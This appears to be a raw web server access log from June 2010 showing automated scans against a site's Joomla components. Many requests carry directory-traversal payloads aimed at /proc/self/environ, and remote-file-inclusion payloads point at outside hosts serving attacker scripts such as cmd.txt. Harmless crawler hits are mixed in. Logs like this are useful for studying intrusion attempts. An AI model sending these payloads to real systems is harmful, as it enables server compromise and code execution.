88.191.94.188 - - [17/Jun/2010:04:21:38 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
88.191.94.188 - - [17/Jun/2010:04:21:31 -0700] "GET /logs/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
88.191.94.188 - - [17/Jun/2010:04:21:57 -0700] "GET /logs/access.log/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
88.191.94.188 - - [17/Jun/2010:04:21:48 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
88.191.94.188 - - [17/Jun/2010:04:21:58 -0700] "GET /logs/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
88.86.118.210 - - [17/Jun/2010:04:24:04 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.86.118.210 - - [17/Jun/2010:04:24:04 -0700] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.86.118.210 - - [17/Jun/2010:04:24:04 -0700] "GET /logs/access.log%20%20//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
81.93.240.99 - - [17/Jun/2010:04:27:16 -0700] "GET /logs/access.log%20%20/?option=com_janews&controller=http://www.ar.gutech.edu.om/xmlrpc/cache/muLL? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
81.93.240.99 - - [17/Jun/2010:04:27:16 -0700] "GET /logs/?option=com_janews&controller=http://www.ar.gutech.edu.om/xmlrpc/cache/muLL? HTTP/1.1" 200 5943 "-" "Mozilla/5.0" "elfagr.net"
81.93.240.99 - - [17/Jun/2010:04:27:16 -0700] "GET /?option=com_janews&controller=http://www.ar.gutech.edu.om/xmlrpc/cache/muLL? HTTP/1.1" 200 1465 "-" "Mozilla/5.0" "elfagr.net"
81.93.240.99 - - [17/Jun/2010:04:27:34 -0700] "GET /logs/?option=com_janews&controller=http://www.ar.gutech.edu.om/xmlrpc/cache/muLL? HTTP/1.1" 200 5943 "-" "Mozilla/5.0" "elfagr.net"
81.93.240.99 - - [17/Jun/2010:04:27:34 -0700] "GET /?option=com_janews&controller=http://www.ar.gutech.edu.om/xmlrpc/cache/muLL? HTTP/1.1" 200 1465 "-" "Mozilla/5.0" "elfagr.net"
81.93.240.99 - - [17/Jun/2010:04:27:34 -0700] "GET /logs/access.log%20%20/?option=com_janews&controller=http://www.ar.gutech.edu.om/xmlrpc/cache/muLL? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
81.93.240.99 - - [17/Jun/2010:04:28:08 -0700] "GET /logs/access.log/?option=com_janews&controller=http://www.ar.gutech.edu.om/xmlrpc/cache/muLL? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
81.93.240.99 - - [17/Jun/2010:04:28:34 -0700] "GET /logs/access.log/?option=com_janews&controller=http://www.ar.gutech.edu.om/xmlrpc/cache/muLL? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [17/Jun/2010:04:30:14 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
88.191.94.188 - - [17/Jun/2010:04:30:22 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
69.90.47.83 - - [17/Jun/2010:04:32:01 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
209.61.244.6 - - [17/Jun/2010:04:32:25 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "elfagr.net"
67.218.116.166 - - [17/Jun/2010:04:32:26 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "elfagr.net"
67.195.115.166 - - [17/Jun/2010:04:32:57 -0700] "GET /test/?M=A HTTP/1.0" 200 644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "elfagr.net"
69.90.47.83 - - [17/Jun/2010:04:35:07 -0700] "GET /logs/access.log/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
69.90.47.83 - - [17/Jun/2010:04:34:57 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
69.90.47.83 - - [17/Jun/2010:04:34:58 -0700] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
216.129.119.48 - - [17/Jun/2010:04:35:55 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "elfagr.net"
88.86.118.210 - - [17/Jun/2010:04:37:28 -0700] "GET /logs/access.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
69.90.47.83 - - [17/Jun/2010:04:38:20 -0700] "GET /logs/access.log/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
69.90.47.83 - - [17/Jun/2010:04:38:20 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
69.90.47.83 - - [17/Jun/2010:04:38:21 -0700] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
209.61.244.6 - - [17/Jun/2010:04:41:36 -0700] "GET /logs/access.log/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "elfagr.net"
209.61.244.6 - - [17/Jun/2010:04:41:27 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "elfagr.net"
209.61.244.6 - - [17/Jun/2010:04:41:27 -0700] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "elfagr.net"
66.249.65.72 - - [17/Jun/2010:04:42:10 -0700] "GET /test/images/Sec_main/%3C%=dbRecordSet2( HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" "www.elfagr.net"
61.97.159.28 - - [17/Jun/2010:04:42:31 -0700] "GET /logs/?option=com_rokdownloads&controller=http://www.ar.gutech.edu.om/xmlrpc/cache/muLL? HTTP/1.1" 200 5943 "-" "Mozilla/5.0" "elfagr.net"
61.97.159.28 - - [17/Jun/2010:04:42:41 -0700] "GET /?option=com_rokdownloads&controller=http://www.ar.gutech.edu.om/xmlrpc/cache/muLL? HTTP/1.1" 200 1465 "-" "Mozilla/5.0" "elfagr.net"
61.97.159.28 - - [17/Jun/2010:04:42:32 -0700] "GET /logs/access.log/?option=com_rokdownloads&controller=http://www.ar.gutech.edu.om/xmlrpc/cache/muLL? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
61.97.159.28 - - [17/Jun/2010:04:42:44 -0700] "GET /?option=com_rokdownloads&controller=http://www.ar.gutech.edu.om/xmlrpc/cache/muLL? HTTP/1.1" 200 1465 "-" "Mozilla/5.0" "elfagr.net"
61.97.159.28 - - [17/Jun/2010:04:42:34 -0700] "GET /logs/access.log/?option=com_rokdownloads&controller=http://www.ar.gutech.edu.om/xmlrpc/cache/muLL? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
61.97.159.28 - - [17/Jun/2010:04:42:44 -0700] "GET /logs/?option=com_rokdownloads&controller=http://www.ar.gutech.edu.om/xmlrpc/cache/muLL? HTTP/1.0" 200 5927 "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [17/Jun/2010:04:44:07 -0700] "GET /logs/access.log//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
88.191.94.188 - - [17/Jun/2010:04:44:07 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
88.191.94.188 - - [17/Jun/2010:04:44:17 -0700] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
88.191.94.188 - - [17/Jun/2010:04:44:13 -0700] "GET /logs/access.log//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
88.191.94.188 - - [17/Jun/2010:04:44:24 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
88.191.94.188 - - [17/Jun/2010:04:44:14 -0700] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
88.191.94.188 - - [17/Jun/2010:04:44:25 -0700] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
88.191.94.188 - - [17/Jun/2010:04:44:35 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
88.191.94.188 - - [17/Jun/2010:04:46:35 -0700] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
88.191.94.188 - - [17/Jun/2010:04:46:45 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
201.94.229.85 - - [17/Jun/2010:04:50:19 -0700] "GET /?view=page&pagename=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 200 1465 "-" "Mozilla/5.0" "elfagr.net"
201.94.229.85 - - [17/Jun/2010:04:50:09 -0700] "GET /logs//?view=page&pagename=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 200 5948 "-" "Mozilla/5.0" "elfagr.net"
201.94.229.85 - - [17/Jun/2010:04:50:11 -0700] "GET /logs/access.log//?view=page&pagename=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:04:51:36 -0700] "GET /logs/access_100408.log//index.php?abg_path=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.205.85.5 - - [17/Jun/2010:04:51:45 -0700] "GET /logs//index.php?abg_path=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.205.85.5 - - [17/Jun/2010:04:51:45 -0700] "GET /logs/access_091119.log//index.php?abg_path=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.205.85.5 - - [17/Jun/2010:04:51:36 -0700] "GET /index.php?abg_path=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.205.85.5 - - [17/Jun/2010:04:53:50 -0700] "GET /logs//index.php?abg_path=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.205.85.5 - - [17/Jun/2010:04:53:50 -0700] "GET /logs/access_100408.log//index.php?abg_path=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.205.85.5 - - [17/Jun/2010:04:53:50 -0700] "GET /logs/access_091119.log//index.php?abg_path=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.205.85.5 - - [17/Jun/2010:04:53:50 -0700] "GET /index.php?abg_path=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
119.235.18.12 - - [17/Jun/2010:04:56:50 -0700] "GET /logs/access.log%20%20//?view=page&pagename=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
119.235.18.12 - - [17/Jun/2010:04:56:50 -0700] "GET /?view=page&pagename=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 200 1465 "-" "Mozilla/5.0" "elfagr.net"
119.235.18.12 - - [17/Jun/2010:04:56:50 -0700] "GET /logs//?view=page&pagename=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 200 5948 "-" "Mozilla/5.0" "elfagr.net"
209.61.244.6 - - [17/Jun/2010:04:58:00 -0700] "GET /logs/access.log/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "elfagr.net"
209.61.244.6 - - [17/Jun/2010:04:58:10 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "elfagr.net"
209.61.244.6 - - [17/Jun/2010:04:58:00 -0700] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "elfagr.net"
81.93.240.60 - - [17/Jun/2010:04:58:53 -0700] "GET /index.php?option=com_virtuemart&Itemidhttp://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
69.163.241.105 - - [17/Jun/2010:04:59:42 -0700] "GET /index.php?option=com_virtuemart&Itemidhttp://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
69.163.241.105 - - [17/Jun/2010:04:59:33 -0700] "GET /index.php?option=com_virtuemart&Itemidhttp://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
95.108.150.235 - - [17/Jun/2010:04:59:56 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.elfagr.net"
95.108.150.235 - - [17/Jun/2010:04:59:57 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Yandex/1.01.001 (compatible; Win16; H)" "elfagr.net"
95.108.150.235 - - [17/Jun/2010:04:59:58 -0700] "GET / HTTP/1.1" 200 1465 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.elfagr.net"
95.108.150.235 - - [17/Jun/2010:05:00:08 -0700] "GET / HTTP/1.1" 200 1465 "-" "Yandex/1.01.001 (compatible; Win16; H)" "elfagr.net"
95.108.150.235 - - [17/Jun/2010:05:00:00 -0700] "GET / HTTP/1.1" 200 1465 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.elfagr.net"
95.108.150.235 - - [17/Jun/2010:05:00:01 -0700] "GET / HTTP/1.1" 200 1465 "-" "Yandex/1.01.001 (compatible; Win16; H)" "elfagr.net"
91.121.115.161 - - [17/Jun/2010:05:04:06 -0700] "GET /index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.115.161 - - [17/Jun/2010:05:04:18 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.115.161 - - [17/Jun/2010:05:04:48 -0700] "GET /index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.115.161 - - [17/Jun/2010:05:05:19 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.115.161 - - [17/Jun/2010:05:16:13 -0700] "GET /logs/index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
91.121.115.161 - - [17/Jun/2010:05:16:03 -0700] "GET /index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
69.163.241.105 - - [17/Jun/2010:05:16:57 -0700] "GET /logs/access.log/index.php?option=com_virtuemart&Itemidhttp://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
69.163.241.105 - - [17/Jun/2010:05:17:07 -0700] "GET /index.php?option=com_virtuemart&Itemidhttp://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
69.163.241.105 - - [17/Jun/2010:05:16:58 -0700] "GET /logs/index.php?option=com_virtuemart&Itemidhttp://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
69.163.241.105 - - [17/Jun/2010:05:17:22 -0700] "GET /logs/access.log/index.php?option=com_virtuemart&Itemidhttp://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
69.163.241.105 - - [17/Jun/2010:05:17:32 -0700] "GET /index.php?option=com_virtuemart&Itemidhttp://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
69.163.241.105 - - [17/Jun/2010:05:17:23 -0700] "GET /logs/index.php?option=com_virtuemart&Itemidhttp://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
91.121.115.161 - - [17/Jun/2010:05:21:39 -0700] "GET /logs/access.log/index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.115.161 - - [17/Jun/2010:05:21:49 -0700] "GET /index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.115.161 - - [17/Jun/2010:05:21:39 -0700] "GET /logs/index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.115.161 - - [17/Jun/2010:05:22:41 -0700] "GET /logs/access.log/index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
81.93.240.99 - - [17/Jun/2010:05:22:41 -0700] "GET /?option=com_gcalendar&controller=http://www.ar.gutech.edu.om/xmlrpc/cache/muLL? HTTP/1.1" 200 1465 "-" "Mozilla/5.0" "elfagr.net"
91.121.115.161 - - [17/Jun/2010:05:22:51 -0700] "GET /index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
81.93.240.99 - - [17/Jun/2010:05:22:41 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=http://www.ar.gutech.edu.om/xmlrpc/cache/muLL? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
81.93.240.99 - - [17/Jun/2010:05:22:51 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.ar.gutech.edu.om/xmlrpc/cache/muLL? HTTP/1.1" 200 5943 "-" "Mozilla/5.0" "elfagr.net"
91.121.115.161 - - [17/Jun/2010:05:22:41 -0700] "GET /logs/index2.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
81.93.240.99 - - [17/Jun/2010:05:22:42 -0700] "GET /?option=com_gcalendar&controller=http://www.ar.gutech.edu.om/xmlrpc/cache/muLL? HTTP/1.1" 200 1465 "-" "Mozilla/5.0" "elfagr.net"
81.93.240.99 - - [17/Jun/2010:05:22:42 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.ar.gutech.edu.om/xmlrpc/cache/muLL? HTTP/1.1" 200 5943 "-" "Mozilla/5.0" "elfagr.net"
81.93.240.99 - - [17/Jun/2010:05:22:42 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=http://www.ar.gutech.edu.om/xmlrpc/cache/muLL? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
91.121.115.161 - - [17/Jun/2010:05:22:46 -0700] "GET /logs/access.log/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.115.161 - - [17/Jun/2010:05:22:46 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.115.161 - - [17/Jun/2010:05:22:46 -0700] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
81.93.240.60 - - [17/Jun/2010:05:23:19 -0700] "GET /logs/access.log/index.php?option=com_virtuemart&Itemidhttp://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
81.93.240.60 - - [17/Jun/2010:05:23:19 -0700] "GET /index.php?option=com_virtuemart&Itemidhttp://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
81.93.240.60 - - [17/Jun/2010:05:23:20 -0700] "GET /logs/index.php?option=com_virtuemart&Itemidhttp://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
91.121.115.161 - - [17/Jun/2010:05:26:24 -0700] "GET /logs/access.log/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.115.161 - - [17/Jun/2010:05:26:34 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.115.161 - - [17/Jun/2010:05:26:24 -0700] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
81.93.240.99 - - [17/Jun/2010:05:30:56 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.ar.gutech.edu.om/xmlrpc/cache/muLL? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
81.93.240.99 - - [17/Jun/2010:05:31:31 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.ar.gutech.edu.om/xmlrpc/cache/muLL? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.195.115.166 - - [17/Jun/2010:05:32:33 -0700] "GET /SlurpConfirm404/linux_include_asm-i386_ptrace.h/ARTE-0086-J/thegriff.htm HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "elfagr.net"
70.38.52.2 - - [17/Jun/2010:05:32:28 -0700] "GET /index.php?option=com_mediqna&controller=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
70.38.52.2 - - [17/Jun/2010:05:32:28 -0700] "GET /logs/access_100603.log//index.php?option=com_mediqna&controller=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
70.38.52.2 - - [17/Jun/2010:05:32:38 -0700] "GET /logs//index.php?option=com_mediqna&controller=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
70.38.52.2 - - [17/Jun/2010:05:32:38 -0700] "GET /index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
70.38.52.2 - - [17/Jun/2010:05:32:28 -0700] "GET /logs//index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
70.38.52.2 - - [17/Jun/2010:05:32:28 -0700] "GET /index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
70.38.52.2 - - [17/Jun/2010:05:32:28 -0700] "GET /logs//index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
70.38.52.2 - - [17/Jun/2010:05:32:38 -0700] "GET /errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
70.38.52.2 - - [17/Jun/2010:05:32:29 -0700] "GET /logs/access_100603.log//index.php?option=com_mediqna&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
70.38.52.2 - - [17/Jun/2010:05:32:29 -0700] "GET /logs/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
